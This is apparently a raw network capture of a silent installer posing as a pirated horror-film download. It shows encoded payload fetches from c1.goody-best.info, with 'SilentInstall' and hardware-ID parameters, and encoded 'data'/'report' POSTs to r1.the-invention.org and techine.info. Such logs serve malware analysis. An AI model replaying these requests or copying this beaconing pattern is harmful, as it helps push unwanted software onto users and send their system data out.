Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:19 GMT
Content-Type: text/html
Content-Length: 10226
Connection: close
Content-Disposition: attachment; filename="6_1_2.txt"
..p.k.A.O.a.D.W.Q.h.y.e.P.w.e.o.1.2.3.j.k.8.O.0.c.S.7.I.R.F.O.I.L.M.K. .T.o.3.Z.x.6.Z.C.Y.H.J.I.h.Q.e.c.4.0.y.K.n.P.e.Q.v.l.e.X.m.N.g.Q.c.Z.3.2.Y.l.0.2./.3.d.F.X.l.2.2.i.u.I.K.l.4.Y. .A.a.e.T.0.C.F.f.s.x.x.B.p./.T.x.k.H.S.8.O.s.y.G.h.y.z.h.t.i.R.D./.M.E.R.v.6.8.N.M.U.S.O.b.x.j.q.a.C.e.e.F.I.i.c.b.x.I.f.J.f.Z.9.2.V.9.w.h.x.S.0.m.I.l.t.U.n.l.d.S.n.9.J.m.J.n.A.q.B.A.4.0.c.o.J.r.H.l.Q.4.Q.T.y.O.J.K.d.7.W.o.h.z.f.x.Y.B.v.N.h.z.T.T.b.h.x.c.I.C.Y.Q.y.q.y.N.n.g.r.n.4.S.g.9.b.F.B.U.0.i.q.Y.z.1.P.7.F.j.v.l.9.4.L.j.e.b.6.v.6.6.p.w.s.v.L.H.o.a.0.y.i.v.G.I. .Z.j.P.x.E.Q.z.8.V.U.g.p.Z.q.T./.H.W.1.D.W.V. .u.A.e.q.7.3.M.f.Q.4.c.6.D.r.a.q.1.H.e.z.8./.J.F.Y.c.J.8.k.w.t.m.N.f.W.I.q.U.F.J.5.R.h.K.P.T.n. .M.U.Z.b.P.K.L.D.j.2.4.x.J.L.9.9.A.e.G.K.f.3.Y.M.h.V.0.k.Q.F.k.T.x.Y.m.U.T.8.Z.6.1.F.m.1.I.F.B.P.i.e.0.J.Y.U.u.z.7.7.l.3.v.z.W.R.J.X.P.0.A.n. .o.p.3.5.8.K.3.j.C.D.e.c.h.g.3.g.9.c.D.N.s.B.L.J.E./.P.U.k.2.C.j.C.Q.s.T.2.z.D.g.N.y.U.b.S.7.A.g.J.4.p.t.i.B.G.p.2.Z.V.Y.x.2.3.d.H.e.U.W.m.G.L.R.1.d.G.2.I./.6.g.P.J.u.n.Q.2.B.L.S.K.y.X. .z.s.L.Q.p.8.H.l.l.x.4.O.4.7.7.1.t.M.L./.J./.f.9.c. .Q.7.T.3.g.R.s.s.j.1.g.d.a.3.5.Y.y.i.X.I.k.r.w.I.D.d.q.s.P.P.n.6.1.V.T.x.x.T.Z.4.Z.I.i.4.I.o.t.Y.V.c.0.U.5.L.e.h.e.W.O.b. .u.x.Z.s.E.R.3.B.5.g.o.W.x.0.P.T.5.q.k.9.i.K.Y.B.X.V. .0. .5.P.G.K.8.s.x.Y.9.b.k.A.a.W.x.a.I.6.2.K.z.9.Q.v.F.G.U.H.J.g.7.T.l.x.z.H.O.K.e.p.5.U.M.K.Y.P.3.M.x.G./.Z.N. .r.6.q.L.R.l.b. .m.z.2.U.e.x.a.v.3.Q.3.N.a.T.q.B.W.f.f.W.r.s.w.B.a.Y.L.Z.d.F.E.S.0.4.y.T.0.q.k.H.1.2.G.m.V.O.7.r.p.8.W.T.C.D.a.8.U.L.P.t.G.S.g.J.B.m.o. .l.7.k.i.D.r.e.S.q.D.i.
<<< skipped >>>
GET /?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:06 GMT
Content-Type: text/html
Content-Length: 8364
Connection: close
Content-Disposition: attachment; filename="4_2.txt"
..O.V.v.c.E.m.j.2.Y.Z.n.7.y.k.b.c.d.e.p.Z.W.O.q.Z.2.l.f.U.C.Y.h.2.J.6.e. .z.8.u.y.6.g./.k.d.U.R.j.D. .Z.o.R.d.N.E.D.J.T.8.d.P.q.z.i.5.V.8.j.e.R.e.5.X.o.6.X.h.W.W.N.f.T.T.J.g.Q.L.Z.5.3.t.g.K.H.E.0.t.P.t.K.V.L.7.E.L.Q.f.V.l.h.5.A.z.w.u.D.P.t.B.9.f.c.1.Y.k.K.v.2.Z.c.A.l.a.u.M.d.L.k.M.V.C.S.T.L.P.1.C.Q.s.P.R.s.3.A.I.H.x.N.6.e.4.8.f.V.n.9.p.P.x.k.Y.S.p.b./.l.V.n.G.u.s.S.H.g.6.x.5.K. .3.c.O.D.L.T.m.H.W.2.2.7.q.P.C.7.0.r.a.w.t.P.i.d.5.e.j.0.Z.m.k.y.1.b.O.0.E.E.c.3.z.D.r.9.w.a.E.u.V.y.q.k./.D.D.d.N.E.a.P.O.0.W.1.S.k. .5.p.V.G.W.M.G.t.B.D.z.q.i.G.5.U.j.K.q.c.P.W.n.U.R.S.i.B.A.O.Z.6.W.b.g.4.y.3.z.A.l.9.y.V.6.W.3.U.V.3.L.p.Y.d.J.F.Q.7.x. .i.j.0.j.9.c.7. .p.Z.t.A.6.8.E.r.D.b.z.c.F.r.j.P.3.g.z.4.q.A.Y.2.s.r.e.O.s.u.7.f.N.g.l.J.X.2.H.1.f.Z.o.0.q.V.Q.F.r.c.V.8.j.1.j.k.x.8.2.f.r.E.P.B.U.X.5.B.Z.J.s.T.F.u.e.Y.1.B.j.2.A.j.m.p.z.B.5.s.s.2.K.D.z.1.e.v.M.F.M.k.Q.Q.l.t.s.6.4.Z.x.d.6.l.r.j.9.a.K.2.O.h.H.u.b.O.r.2.g.C.i.0.2.K.l.l./.m.e.K.a.M.f. .5.j./.X.P.3.n.J.3.p.X.I.n.b.C.w.U.b.d. ./.N.n.6. .U.O.6.8.G.8.7.j.q.K.p.F.W.X. .W.R.0.1.7.c.r.o.t.a.N.P.L.X.z.8.Q.g.x.w.j.i.b.T.R.L.m.a.A.a.U.V.z.u.s.B.x.1.G.l.4./.p.r.O.R.3.l.4.X.2.H.N.I.k.A.z.f.9.o.h.T.E.A.j.B.B.Q.E.v.A.x.J.7.d.i.Y.A.t.T.3.a.X.J.f.s.O.6.j.S. .7.a.E.e.S.8.M.E.b.o.y.f.v.V.v.E.2.G.Z.B.d.V.I.Z.C.v./.q.r.m.U.C.u.j.7.G.F.Z.E.p.i.Z.M.B.F.E.5.f.3.c.X.H.Z.G.k.z.E.h.u.5.p.p.S.4.P.N.p.V.t.b.q.P.U.G.2.Z.G.6.2.j.p.Z.n.a.K.W.H./.J.w.S.p.t.s.i.E.1.O.A.c.F.t.4.H.Y.M.8.7.r.G.E.A.V.0.c.d.s.m./.N.I.N.d.g.5.t.U.V.V.6.h.J./.G.Z.d.U.J.I.6.u.Z. .2.8.b.f.v.f.n.S.m.S.T.S.5.d.z.w.g.s.Z.C.6.q.f.u.X.G.
<<< skipped >>>
GET /?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8366
Connection: close
Content-Disposition: attachment; filename="4.txt"
..s.O.b.W.Y.G.f.T.a. .v.0.u.8.g.B.C.D.2.j.m.N.x.3.5.X.l.6.G./.o.m.F.2.5.K.a.I.h.7.x.i.u.d.S.X.g.z.6.K.K.f.Y.p.k.6.w.H.i.k.F./.M.m.p.l.F.9.G.W.u.M.w.a.L.7.D.O.W.A.T.r.N.a.Y.B.S.T.q.y.1.z.K.c.U.W.b.F.s.H.O.M.3.5.k.o.3.e.o.a.D.K.6.z.e.R.u.c.s.y.D.g. .p.u.P.q.8.I./.g.D.t.V.j.n.i.s.V.L.p.F.c.G.e.r.f.x.w.h.K.q.k.f.C.d.r. .T.7.Q.d.a.Y.H.W. .E.g.N.q.9.j.E.K.t.s.H.3.T.7.l.f.k.h.E.Z.s.e.s.s.X./.l.M.A.0.3.a.g.y.i.V.7.n.0.U.0.D.G.9.Z.w.T.K.x.E.B.c.u.y.p.A.J.y.D.S.q.G.E.Q.5.9.G.s.4.i.Y.9.y. .C.I.a.O.E.e.u.8.z.n.8.A.S.L.S.j.v.W. .L.J.7.5.M.t.V.u.l.b.A.L.u.9.R.h.7./.F.L.9.G.8.h.f.t.h.z.N.T.O.m.K.g.W.h.T.F.r. .w.0.h.u.4.M.6.9.3.f.w.9./.0.n.R.R.4.4.R.A.o.l.p.G.h.6.6.N.w.n.p.K.H.g.s.Z.Z.C.D.G.l.e.X.9.F.9.Y.W.u.7.X.P.Z.1.0.l.2.h.0.Y.d.S.l.h.c.n.n.X.h.w.b.5.U.u.k.A.R.5.Y.O.n.4.R.o.k.L.c.V.i.c.F.s.R.c.N.n.u. .W.s.P.C.3.m.9.6.g.b.m.M.g.G.i.F.3.p.Z.E.4.J.D.7.Q.v.R.o.R.h.v.E.J.R.C.y.w.6.N.R.U.M.c.v.M.Z.Z.L.Z.E.T.F.L.4.b.t.m.1.C.G.z.f.w.T.C.x.8.h.h.Z.p.w.M.Z.N.r.D.J.q.q.K.r.0.8.L.6.i.S.p.r.H./. .D.x.9.h.H.i.w.H.T.v.T.g.9.i.F.Q.J.A.k.7.v.N.n.a.U.y.J.8.U.7.v. .3.u.i.I.2.T.3./.g.O.n.L.F.Y.K.z.d.G.g.j.h.h.J.m.W.h.h.F.W.N.K.Z.E.H.v.B.N.u.h.B. .W.i.R.6.d.x.z.G.d.Y.G.8.w.h.m.r.Q.K.i.M.b.A.s.d.L.1.Y.A.D.P.R.z.N.s.u.w.g.9.9.9.6.G.7.t.o.c.Q.g.g.j.1.s.o.r.2.W.a.C.G.D.I.C.h.L.o.P.J.r.m.0.I.k.0.X.t.N.X.Q.l.r.b.E.o.Z.g.d.8.1.b.M.K.u.q.9.I.X.N.C.E.w.m.2.h.O.V.x.p.l.l.7.5.4.U.F.M.z.u.8.T.J.u.8.E.j.E.p.U.E.4.7./.Z.M.f.p.4.6.W.L.B.V.l.M.w.q.7.U.V.9.K.Q.L.g.N.P.w.J.z.0.J.C.T.4.1.m.3.x.g.k.e.z.L.x.K.p.o.E.c.s.l.r.6.c.l.C.f.d.Y.0.g.P.r.x.O.w.k.l.G.1.U.t.R.
<<< skipped >>>
GET /?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 6714
Connection: close
Content-Disposition: attachment; filename="5.txt"
..c.p.B.Q.b.W.Y.K.i. .K.1.Y.L.w.L.F.H.C./.1.E.V.v.3.r.q.Q.p.O.q.n.m.J.w.9.D.I.V.r.u.p./.h.S.a.2.C.V.R.T.I.m.F. .7.6.f.e.W.1.2.h.m.b.O.5.X.O.N.F.0.x.C.1.m.O.G.0.D.T. .f.a.n.G.W.Z./.v.2.g.R.o.N.X./.1.S.B.b.I.j.c.e.A.R.f.u.l.B.0.i.c.u.B.i.c.3.D.2.h.G.1.m.n.1.L.6.k.h.q.H.d.9.l.m.J.q.l.M.2.r.O.2.Y.U.s.T.s.f.n.x.C.8.d.z.w.I.h.s.Q.j.O.O.S.D.l.3.e.F.9.6.p.m.4.k.8.9.O.6.i.a.F.3.C.X.8.t.b.E.E.M.3.4.X.B.5.i.r.p.S.M.T.3.K.V.g.7.1.t.1.b.y.2.o.N.Q.M.r.d.e.N.3.R.s.s.R.O.U./.y.b.C.s.i.P.1.M.T.W.0.y.R.N.U.W./.C.e.f.y.K.J.1.2.N.G. .u.T.s.3.D.E.X.l.U.s.j.d.C.J.Z.g.T.u.j.y.7.R.E.x.H.g.p.u.9.h.P.W.f.M.s.9.c.N.s.B.j.E.y.1.c.V.o.2.l.3.E.Y.C.j.o.D.g.U.L.L.8.s.Z.5.s.p.H.N.4.S.6.l.b.R.K.A.Y.r.3.8.6.C.9.c.w.n.r.P.z.4.E.V.K.P.s.H.p.u.x.w.h.B.r.o.B.C.5.9.w.f.9.d.T.O.7.a.9. .V.U./.G.f.B.l.e.A.o.y.F.H.e.S.G.c.0.0.5.6.K.7.B.0.2.p.0.m.V.Q.d.e.H.m.y.5.2.g.S.P.z.w.M.C.P.F.q./.z.Y.s.S.s.F.6.R.L.o.h./.w.c.4.p.d.a.G.L.r.l.I.7.s.o.4.p.S.M.X.D.M.i.5.g.L.R./.z.t.m.X.r.G.C.A.l.w./.f.g.6.K.w.u. .a.p.G.R.T.9.j.Y.l.R.8.k.r.3.p.M.s.k.s.0.1.3.w.y.8.S.c.6.g.W.K.j.1.G.k.T.0.R.f.6.7.T.k.Q.n.S.P.X.V.k.1.5.g.l.V.9.S.j.g.z.g.C.9.n.F.4.E.b.g.L. .9.B.M.4.Z.h.1.b.5.Q.N.T.D.3.7.n.M.K.F.u.8.e.S.0. .L.i.v.8.f.v.t.Y.J.e.f.z.Z.z.w.f.j.V.x.L.g.d.a.Z.l.R.V.D./.7.5.M.L.Q.t.B.r.g.N.3.P.l.8.q.0.C.8.F.F.N.U.L.t.K.O.5.s.N.n.T.Q.c.D.a.P.h.h.h.Y.r.R.X.u.e.z.4.O.O.w.Z.L.6.v.1.l.Z.W.r.A.Z.v.k.J.q.x.D.G.H.v.X.d.h.N. .n.A.9.V.7.z.h.6./.f.u.K.c.V.8.Q.p.T.G.0.s.n.Z.t.1.z.g.Z.n.1.X.C.E.2.s.I.P.R.A.V.B.y.z.Q.T.P.T.Q.M./.u.L.c.C.L.I.x. .d.F.d./.R.O.Z.d.h.a.1.T.S.4.u.y.L.V.r.p.u.1.t.Z.6.e.
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5958
Cache-Control: no-cache
data=/Wg8/rvm30eXNBCDWYo6y&report=EoWEfO6Cpa i3NvZTV4ZYCimFI04jjvSuiR3cLYmpTZbPHy29g1HxId40XDF/bIXs6JmMFhEyrtdka6URZidHpwsRYdsErYKPOYN9M7fMp5PA2qYivrNeigFmHNOqahSB Be8CNnjLYxieXrkwcx1N7AeAGA1BUEQImrZwv3XaajCLaSKCwiIIX14fKW9nujhqLY3Zu5Y0b5K0SjQkFfaE48kKUdQtBbeXxmpFDG18jZQtzaTNjyFjCdZgWv3kJ3f893Hk9TgEl1QzRp1h0y3HKBAYezrz3xL9ZjTHNoZbH4K9TP6eqLEczHtcBFyfKPovcQxYelKRgDQe16Ymds6m18UsBVSlDEBSC3XKEjLYINMRefhZVMDCFeF6PjRrJ mV4IMcxXwoeK1uPT8AMzRWgve NsqIIMxalnqR1rcY4ys0Rs5WTn7cZbMlADVNdSUD2Yju0HaCeZD2rY1MrVQmwI85oy4LiXpGyJuqg89eIn8KeYYfQjnkopFXcX1EwZKyf2OK2h9Pyg EpQpk3FeoaLC8HZ5SXScPO2ZD3qgKgbDrbNidqrXhFfUGcMT/dxyvtcTKOFMOCGGhvGdDYNFr2P6RCk3ZAaipHsIW5qJIWK2XKzUAYNqUrHYaGaqzJJPIKTuOK7JirrVCRG81sPabzS 6zViEX FzNmqxzqFcKJoXVJuhDFI qe2wQ57HpCdDOJhYV8dSkucbxLktnWccBMG6nSUY71rEXeXVNZIOvcGOlpdS1ASO2UroNOvgunHZis1HRYN40EwNyk6zEsc2y2If RjYQZXILVKCcaAKH21Knq5uYTq0s/C1N18bXbt52X0Lx4T3Kls /y5pFktM7YgAnabbaEXFbgwJyIwod3FSWyuASo4piXZEHGAhtr1RSSjHup31CU8eY F1k/B90MQyjOAaGd 4KBF9vRCTnT6OVlAZ/tbRop08PbouNO/c52 /PGGYgpmNfHfns3OiYGqE9XrvicsYcpI ycY80JW8YHeBqY2G4eSjBE9skSoP6nHsQ3kP 6WzaxqD7nkP1kEAMqn4CgVdBKwkfXkD 8o9anUx2S5QqGQcMX8h3KZKu175ij2TtX/cyQUUpfkQdoUS8vIlYNthicK8/hDd8tHoAgEafNUU65r8pn 4U nCO0KI2RwfRrhkFOW2EfGO1jMEZ56LaNydtxSSfcP0BtRdUwFj0fZ6JbBQZ9aoACnA9QAsIfRP Bcohv45LefD1kCu5Rm1CkqNK7XOapiBj ENQGtVLnIq2B
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:34 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 2734
Connection: close
Content-Disposition: attachment; filename="4_3.txt"
..l.9.w.g.P.u.r.m.L.6.d.4.n.S.O.h.a.b.H.M./.4.H.T.I.9.F.q.v.q.y.h.X.p.c.k.9.C.2.g.R.r.f.e.M.a.Y.X.q.v.f.6.S.o.G.3.r.D.r.p.0.K.O.1.r.g.r.b.u.l.u.I.F.W.Q.u.e.J.b.k.n.f.B.h.B.B.X.L.e.o.i.1.m.y.8.m.S.Y.F.S.l.I.J.m.9.O.8./.I.x.I.r.9.0.Y.3.W.k.e.y.2.t.D.5./.X.c.1.n.q.i.W.Z.j.v.t.i.l.3.w.n.H.4.M.N.v.F.2.F.6.R.W.H.G.Z.A.G.T.a. .P.9.A.6.C.g.0.i.k.t.t.T.G.d.z.7.4.U.B.K.7.M.J. .b.L.7.b.C.6.W.f.U.l.P.W.d.v.Y.E.p.r.6.L.M.o.3.W. .o.W.W.c.3.s.8.2.y.s.x.f.C.h.6.d. .7.c.I.R.d.4.z.8.B.6.p.8.s.A.7.8.Z.i.0.L.V.r.F.E.5.P.X.E.0.a.a.u.w.D.G.o.L.V.W.O.a.Z.o.E.s.q.Y.4.L.u.3.2.1.f.k.9.N.J.F.L.E.w.S.h.N.V.V.6.W.D.1.i.c.G.C.Q.F.v.h.a.g.D.v.u. .q.B.5.o.q.b.D.v.D.N.3.X.e.b.n.P.1.V.1.9.D.j.y.g.l.4.j.9.b.l.O.K.6.l.Z.Y.o.4.o.W.J.4.g.I.T./.w.N.O.q./.X.R.D.i.d.I.r.s.V.S.R.s.L.W.m.x.r.Z.d.E.b.k.G.m.p.6. .Q.z.l.g.u.Q.V.Q.v.v.f.P.F.e.w.S.a. ./.S./.e.f.r.P.e.X.8.d.u.f.S.V.K.0.E.S.v.Q.u.z.Z.o.u.D.L./.w.x.k.1.u.m.o.n.Z. .9.P.Q.5.E.1.V.q.I.6.1.O.g.J.0.i.r.q.Q.8.7.4.L.n.B.8.V.Y.4.x.3.Y.9.9.c.2.0.s.4.h.E.P.A.4.U.K.j.I.M.Y.Q./.I.V.5.y.v.c.K.3.M.5.O.u.t.1.8.C.O.d.k.K.Y.r.R.L.N.y.L.z.O.N.y.L.2.B.W.F.8.G.U.2.v.I.C.r.u.x.G.5.4.7.j.p.X.X.1.9.a.L.2.7.s.g.9.a.7.H.o.C.k.8./.Y./.i.z.W.e.s.8.6.b.B.7.f.P.B.5.b.I.F.Y.S.S.p.g.2.u.a.p.o.8.8.v.E.R.s.i.j.i.k.P./.Q.I.d.J.5.L./.Q.B.U.W.X.e.R.8.t.U.8.o.R.X.8.A.w.T.C.C.P.D.V.M.9.d.I.t.f.W.K.Z.4.B.B.X.6.7.L.o.6.k.D./.I.D.U.r.p.z.A.j.d.A.m.j.3.I.m.m.B.2.Z.3.D.E./.o.P.0.v.z.h.f.f.9.c.W.o.z.7.u.k.Z.1.T.S.5.U.d.7.S.B.4.Z.y.k.l.Q./.E./.M.I.u.n.9.t.f.J.V.4.L.p.f.h.C.L.N.M.n.y.2.T.Z.c.9.d.J.Q.2.a.4.n.5. .j.R.A.M.7.x.e.k.r.T.6.s.T.5.
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5368
Cache-Control: no-cache
data=ACXF6JRElEdb1m3OabzJ3D2b5w+m8D2mXeYYaRzI1yxvnemJCt52ZBFyMtNgLpO4pLxyGsAjeqZ9OswCYbl2+jbbpPr1RyQfI3ee6GhykO3VawGEWa7pnDSSQuBaulvNJ7p7aGFXgYcpy1Q3Va8Z9z1lH5tjXJSzqEhvz1Mmk1JHLogUfHTG4O9SW8b4DDNGE5CXvVq1OfOLn3hESSnmuaV3xGFr58fqsJt3lZQaLG//sV9aZlaxP2QorO7MNUpVWN59oPiCb1bGEEQ/gR06Z+VexU0Hi+O+NbivyVWQXAzisr6D9FdBrwjxmOJcWF4ODPp8KGF9PW85BmyzcNxu0X4/Sl0zAkvi1yJyEhPST9z7ZS1gh5OqXYW9ZUxeKMkDRqRxNeweBNm7bdSzbRzpEEIdEaZb51mvpSi/HtcQNyvqEUac7jNytxQk06WVLKNvf/FGtj1JJduRfa/mSZB39gbEXetLxJWyK6Rhc/k23WQ58Yr4S7EvnwBQPTFJp7wuTVFxVIxg3+n+FMKFKK+6UXK4WHt+jLh0VFAiKV+ZZ5mHtqr77bC8UuN89eyOZr9dw1dGIOeHK3N/NeJxvtepOiJ62fXuS6y8JZgr2QdyYGCKL7W6fEE6wOns7lzghO7UZL9I85OF2vehjR1ObSAao2/TAS90vFZB9xEACm0eh1+wyF2py4V74dNue8Hmw+GBRg1xbh4B0E4wxrKpprwDfO9aug9i1RYrLwA/gkGp9SpbzIemgfyIUu0+La5MGJkHAQMLN81FAGR4BopxrV5gWdCIIUOH/nqcoQI0Mtb+F6RiwmwnigStk0p4auATkhbWwo8eZKvC0pWNy5igdXs4vYP/qaCLlnE8JBS0G3nMEp7n7nugqeiqxUciJ38yOoux7FYMRThgDBuZmfEZmMK98pj77a4/c7IqCnf703wNwpcE2TfwYmnmitHqGCF2kVuKW45LX5qq5zFRl/GQevshp2rpnf7IMCqi8svICAXLoe0q3LF/Vak8VJhO8oZDsojn3P7goiz8LeLNNCJXZ&report=/ZdSMEwjhs5jh48PRJ8mip8v1zaz/Q8ivu94Okb/5gSwlGGAuO7ilKkT47yCunU7erZ+byBdPtIeayaAqJZ8aTJqhgTuU8A3RysXRmq19j9zYa5AKLq903wDcTNPRwl7fHTkzc3j6q+L7227LVx67xiBr7WKDuvXV1dH3+AUf+jj8TUpuNuJHKuYqxCgX1clEWk8OXjIG1z+Lh+tAnr6
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /get/?data=X78R3fMJAwzVd3H678kNunVp8V2hy/MaNDVsyZviAVqUqjrH5ck2U5rxjd9CME1q/vRUebLuJ4gzt88MkyVCj4gkxrhTS3B1YdjGjV8gH7XkOuh9ahoqAMln6cbQXtJ7J+Cvlf6U4jESk+d1WJIMs+v1kvqLnq2E4QkjYp2oEA7gUDnT2juDYdGkj0Xidb77LHfOSUSz17gfggP//o0tfzmnzmKJmHXJWq8zF04py+O65cCfxslm7EIZk5SLjkyYLRw/4pUUeiwhfSIXe9gPZzy/Q8Mco3sB7HIxiWfTZdfpFYvqY3FtQ1V6+WryJeOikvizLXWStExhAKMrHdivTiqjEQHU54xDXbD5swbLVCzWpMUaIGZSU+Soqr4nGFC0LI0rIhMvXSuwZMZsMjB5DindQWf8is4ytFhtlSNxkwxVoREupyRPVZ7Wf2V5fKlOLxBTI8LpQuBE5tEGIORu1ELgKHLdRapFmsIfcWyPL9bRWFc1Qi/taCUAj+Y4w/tbwTQYv+pd6BV0Isu67h4xUqBuaJdl0m53GADkFUevx23lFBKPUJ6qeUKsK/0U51YvUlw7Fg64kF37NPJecdzX7GbWlGqTOuoFVvPu1tQccEef&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:59 GMT
Content-Length: 0
Connection: close
GET /?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:36 GMT
Content-Type: text/html
Content-Length: 10242
Connection: close
Content-Disposition: attachment; filename="6_1_3.txt"
